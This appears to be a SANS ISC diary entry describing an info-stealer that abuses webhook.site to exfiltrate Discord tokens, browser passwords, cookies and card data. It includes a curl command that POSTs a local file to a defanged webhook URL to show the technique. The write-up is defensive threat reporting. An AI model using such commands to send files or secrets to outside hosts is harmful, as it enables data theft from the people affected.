Last Updated: 2021-12-01 14:23:40 UTC
by Xavier Mertens (Version: 1)
We already reported multiple times that, when you offer an online (cloud) service, there are a lot of chances that it will be abused for malicious purposes. I spotted an info-stealer that exfiltrates data through
webhook.site. Today, many Python scripts use Discord as a C2 communication channel. This time, something different and that looks definitively less suspicious.
webhook.site is an online service that helps you to test webhooks. By definition, a webhook is a technique used to modify a page or an application with custom callbacks. They are also often used to automate data manipulations. Webhooks are perfect to receive JSON data through HTTP POST requests.
- Google Maps Location
- Screenshot of their pc
- All Their Valid Discord Tokens (bypasses betterdiscord's anti-token-grab-protector)
- Password For Discord (You get Their Password if They Update it)
- Their Whole Credit Card (if They Put one in)
- All Their Chrome Passwords And Cookies
How does work
webhook.site? When you visit the page, they will generate a unique webhook for you. Now, you can just watch hit and send HTTP POST requests to it. For example, my webhook was:
I sent this requests:
$ echo “This is a far file” >file.txt $ curl -X POST --data-binary @file.txt hxxps://webhook[.]site/4accef15-fa3b-4926-a853-2b020accd3a2
Data is instantly received by the webhook that the attacker is probably monitoring:
A very efficient and stealthy way to exfiltrate data!
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant